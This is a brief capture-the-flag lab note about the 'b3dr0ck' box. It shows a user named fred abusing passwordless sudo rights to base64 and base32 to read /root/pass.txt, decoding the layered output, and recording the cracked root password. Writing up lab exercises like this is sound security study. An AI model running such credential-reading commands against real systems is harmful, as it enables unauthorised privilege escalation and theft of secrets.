InfoSec LAB

b3dr0ck_sudo_privileges_fred

Created: 1 min read

fred

Checking for sudo privileges of the fred user after making the lateral movement

fred@b3dr0ck:~$ sudo -l
Matching Defaults entries for fred on b3dr0ck:
    insults, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User fred may run the following commands on b3dr0ck:
    (ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
    (ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt

The fred user is able to read the /root/pass.txt file via base32 and base64

fred@b3dr0ck:~$ sudo -u root /usr/bin/base64 /root/pass.txt
TEZLRUM1MlpLUkNYU1dLWElaVlU0M0tKR05NWFVSSlNMRldWUzUyT1BKQVhVVExOSkpWVTJSQ1dO
QkdYVVJUTEpaS0ZTU1lLCg==

TEZLRUM1MlpLUkNYU1dLWElaVlU0M0tKR05NWFVSSlNMRldWUzUyT1BKQVhVVExOSkpWVTJSQ1dOQkdYVVJUTEpaS0ZTU1lLCg==

┌──(kali㉿kali)-[~/archive/thm/b3dr0ck]
└─$ echo TEZLRUM1MlpLUkNYU1dLWElaVlU0M0tKR05NWFVSSlNMRldWUzUyT1BKQVhVVExOSkpWVTJSQ1dOQkdYVVJUTEpaS0ZTU1lLCg== | base64 -d | base32 -d | base64 -d
a00a12aad6b7c16bf07032bd05a31d56

It turns out that the credential hash was encoded multiple times using base64 and base32

Password Cracking

Password hash cracked; flintstonesvitamins Moving on to Privilege Escalation phase

Interactive Graph View

Backlinks